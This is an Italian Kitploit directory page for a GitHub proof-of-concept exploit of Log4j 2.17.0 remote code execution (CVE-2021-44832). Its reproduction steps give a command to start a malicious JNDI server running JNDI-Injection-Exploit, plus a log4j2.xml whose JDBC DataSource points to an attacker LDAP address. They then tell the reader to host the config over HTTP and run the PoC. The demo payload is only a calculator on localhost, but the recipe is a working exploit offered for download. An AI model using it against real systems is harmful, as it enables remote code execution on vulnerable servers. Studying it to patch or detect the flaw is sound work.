Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j_RCE_CVE-2021-44832 — Exploit proof-of-concept per Log4j 2.17.0 RCE (CVE-2021-44832) che utilizza iniezione JNDI con distribuzione di file di configurazione dannosi. | Kitploit
Strumenti/GitHubGitHub/cckuailong/log4j_rce_cve-2021-44832
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and ControlStrumento di Accesso Remoto
GitHubcckuailong/log4j_rce_cve-2021-44832

log4j_RCE_CVE-2021-44832

Exploit proof-of-concept per Log4j 2.17.0 RCE (CVE-2021-44832) che utilizza iniezione JNDI con distribuzione di file di configurazione dannosi.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
414 anni faNon ancora revisionato

Log4j 2.17.0 RCE -- CVE-2021-44832

Riproduzione

  1. Avvia il server jndi malevolo
root@kitploit:~
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"

  1. Modifica la sezione DataSource in config/log4j2.xml con l'indirizzo jndi che hai generato
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
    <Appenders>
        <JDBC name="databaseAppender" tableName="dbo.application_log">
            <DataSource jndiName="ldap://127.0.0.1:1389/nvrcl6" />
            <Column name="eventDate" isEventTimestamp="true" />
            <Column name="level" pattern="%level" />
            <Column name="logger" pattern="%logger" />
            <Column name="message" pattern="%message" />
            <Column name="exception" pattern="%ex{full}" />
        </JDBC>
    </Appenders>
    <Loggers>
        <Root level="warn">
            <AppenderRef ref="databaseAppender"/>
        </Root>
    </Loggers>
</Configuration>

Distribuisci il file di configurazione sul tuo server HTTP

  1. Modifica il Poc

Modificalo per utilizzare il file di configurazione distribuito sul server HTTP

  1. Esegui

Argomento Log4shell

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

Benvenuto a contribuire a reapoc

https://github.com/cckuailong/reapoc

Scarica lo strumento